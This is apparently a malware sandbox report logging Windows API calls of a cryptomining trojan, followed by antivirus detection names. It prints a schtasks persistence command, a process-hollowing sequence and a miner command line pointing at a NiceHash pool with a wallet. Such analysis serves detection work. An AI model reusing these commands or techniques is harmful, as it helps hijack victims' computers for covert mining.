creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000418
1 1 0

CreateProcessInternalW

 thread_identifier: 3752
thread_handle: 0x0000000000000060
process_identifier: 4980
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"'
filepath_r: C:\Windows\system32\schtasks.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

NtResumeThread

 thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 4848
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000134
suspend_count: 1
process_identifier: 4848
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000178
suspend_count: 1
process_identifier: 4848
1 0 0

NtResumeThread

 thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 7112
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000134
suspend_count: 1
process_identifier: 7112
1 0 0

NtResumeThread

 thread_handle: 0x000000000000017c
suspend_count: 1
process_identifier: 7112
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000200
suspend_count: 1
process_identifier: 7112
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000234
suspend_count: 1
process_identifier: 7112
1 0 0

CreateProcessInternalW

 thread_identifier: 4900
thread_handle: 0x0000000000000398
process_identifier: 7932
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"' & exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000390
1 1 0

NtResumeThread

 thread_handle: 0x0000000000000338
suspend_count: 1
process_identifier: 7112
1 0 0

CreateProcessInternalW

 thread_identifier: 2000
thread_handle: 0x00000000000003e0
process_identifier: 1904
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe"
filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000003fc
1 1 0

NtResumeThread

 thread_handle: 0x0000000000000454
suspend_count: 1
process_identifier: 7112
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000c8
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000c8
1 0 0

NtResumeThread

 thread_handle: 0x00000000000000c8
suspend_count: 1
process_identifier: 7112
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000c8
1 0 0

NtGetContextThread

 thread_handle: 0x00000000000000c8
1 0 0

NtResumeThread

 thread_handle: 0x00000000000000c8
suspend_count: 1
process_identifier: 7112
1 0 0

CreateProcessInternalW

 thread_identifier: 6940
thread_handle: 0x0000000000000340
process_identifier: 6316
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: C:\Windows/System32\cmd.exe --cinit-find-e --pool=stratum://`3Mj3isU7efFTY3hwzMhneurp7bRYw5A23B`.ETH@daggerhashimoto.eu-north.nicehash.com:3353 --cinit-max-gpu=50 --response-timeout=30 --farm-retries=30 --cinit-idle-wait=7 --cinit-idle-gpu=90 --cinit-stealth --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Nla3oEzlmSPLhkEvhuuKUoDAGYn1Jr2AI9cp4EWY+N7"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 1
process_handle: 0x000000000000033c
1 1 0

NtUnmapViewOfSection

 base_address: 0x0000000140000000
region_size: 8786417680384
process_identifier: 6316
process_handle: 0x000000000000033c
-1073741799 0

NtAllocateVirtualMemory

 process_identifier: 6316
region_size: 4603904
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000140000000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000000000033c
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $zÎñF>¯Ÿ>¯Ÿ>¯ŸeǛq¯Ÿeǜ"¯Ÿeǚý¯Ÿ5À›-¯Ÿ5Àœ7¯Ÿ5Àš¢¯ŸeǞ2¯Ÿ‹ñ› ­ŸiQ?¯ŸiP.¯ŸøÀ›<¯Ÿ…Ξ=¯Ÿ>¯ž|®ŸøÀš1¯ŸøÀ–(¯ŸøÀŸ?¯ŸøÀ`?¯Ÿ>¯?¯ŸøÀ?¯ŸRich>¯ŸPEd† 6 `ð" +Ô ¡$@@FqÐE``(:ØV8:  E <T°E8ˆ`ú5°û5(€ú500+p.textH++ `.rdata$k0+l+@@.dataüx :ø†:@À.pdataT < ~;@@.nv_fatbH6@>8ž=@À.nvFatBi€EÖD@À_RDATA”EØD@@.rsrc EÚD@@.reloc8ˆ°EŠâD@B
base_address: 0x0000000140000000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0000000140001000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00000001402b3000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00000001403aa000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00000001403c2000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00000001403e4000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer: ±CbF@>@
base_address: 0x0000000140458000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer: ‹&?‹&!‹&/‹&h‹&p‹&€‹&‹&(‹&À‹&Ћ&P‹&à‹&¨‹&ð‹&Œ&E‹&î&ë&&ç&ô&&&ä&&ø&0& &ð&&&à&8&
base_address: 0x0000000140459000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer: (€@€X€p€耈€ € ¸ È Ø¡Ehh¥E€¥E} IDI_ICON1(    ~YR~WP ~XQ ~YR~VO{H>a[Ha[[}TM~YR|NE‚nj_Y(€fa|€e`¯`Z?lh}SKw3'_X\U€e`did‚€fa½€d_¢^X`Zz?3~ZS~VO€c^Qhcy€f`q€d_Ÿ€faĀc^€~ZS \V~XPw3'a[9€e`p€b\_€aZo`Za[‚€d_¬a\XzA6~ZS~YR\U~YQ_YZ€`Zg€d^f`¶€d^ڀb\µ`Z€`Z{~[T(`Z}VN~WP·ÿÿ[T=€c]‡f`­gaµga¸€d^ހd^ç€d^ۀa[¨\UKj}UM}UN‚lg`Y5gagb¦ga±ga¹€d^ހd^ä€d_ހd_Í`ZKlh}UM~YR}VO€d^Tid|hcŠga¥€e_Ҁe`πfaǀc^ƒ~YR ~\UyC;€a[]W€famidvhc€€fa¹€faŀe_®_Y*b]z?7}UMt%€a[>hcwid€fa¸€faÂb\]s}VN\U~ZR €d_]ic€€fa»€d^“~[U]W|NF€e`_X$€ga{€e`¬`Z8€e`|LD~WP{J@€b\Nb\c}SL~XQ~[T~ZR~ZS~[Uþü?ü?øðàààààððøü?ü?þ h<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x000000014045a000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x000000014045b000
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

NtGetContextThread

 thread_handle: 0x0000000000000340
1 0 0

WriteProcessMemory

 buffer: @
base_address: 0x000007fffffd4010
process_identifier: 6316
process_handle: 0x000000000000033c
1 1 0

NtSetContextThread

 registers.r14: 0
registers.r15: 0
registers.rcx: 5371109792
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 3275960
registers.r11: 0
registers.r8: 0
registers.r9: 0
registers.rip: 1998505216
registers.rdx: 8796092841984
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0
thread_handle: 0x0000000000000340
process_identifier: 6316
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000340
suspend_count: 1
process_identifier: 6316
1 0 0

CreateProcessInternalW

 thread_identifier: 7304
thread_handle: 0x0000000000000060
process_identifier: 3944
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: schtasks /create /f /sc onlogon /rl highest /tn "Services64" /tr '"C:\Users\test22\AppData\Roaming\Services64.exe"'
filepath_r: C:\Windows\system32\schtasks.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0
Elastic malicious (high confidence)
DrWeb Trojan.PackedNET.721
MicroWorld-eScan Trojan.GenericKD.46435000
CAT-QuickHeal Trojan.MSIL
McAfee Artemis!AB6993CE2614
Cylance Unsafe
Sangfor Trojan.MSIL.Cryptos.gen
K7AntiVirus Trojan ( 0057c5721 )
Alibaba Trojan:MSIL/AgentTesla.8dd91a1d
K7GW Trojan ( 0057c5721 )
Arcabit Trojan.Generic.D2C48AB8
Symantec Trojan.Gen.2
ESET-NOD32 a variant of MSIL/Kryptik.AAWO
APEX Malicious
Avast Win64:CoinminerX-gen [Trj]
Kaspersky HEUR:Trojan.MSIL.Cryptos.gen
BitDefender Trojan.GenericKD.46435000
Paloalto generic.ml
Tencent Msil.Trojan.Cryptos.Lnxx
Ad-Aware Trojan.GenericKD.46435000
Sophos ML/PE-A + Troj/Kryptik-XQ
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R002C0DF621
McAfee-GW-Edition Artemis!Trojan
FireEye Generic.mg.ab6993ce2614fdcd
Emsisoft Trojan.GenericKD.46435000 (B)
SentinelOne Static AI - Malicious PE
Avira TR/Kryptik.ofuqw
MAX malware (ai score=89)
Microsoft Trojan:MSIL/AgentTesla.FR!MTB
AegisLab Trojan.MSIL.Cryptos.4!c
GData Win64.Trojan.Agent.J5RXUV
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.Generic.C4465258
VBA32 Trojan.MSIL.Cryptos
ALYac Trojan.GenericKD.46435000
TrendMicro-HouseCall TROJ_GEN.R002C0DF621
Rising Trojan.Kryptik/MSIL!1.D6FC (CLASSIC)
Ikarus Trojan.MSIL.Crypt
eGambit Unsafe.AI_Score_99%
Fortinet MSIL/GenKryptik.FFBT!tr
MaxSecure Trojan.Malware.9817250.susgen
AVG Win64:CoinminerX-gen [Trj]
CrowdStrike win/malicious_confidence_80% (W)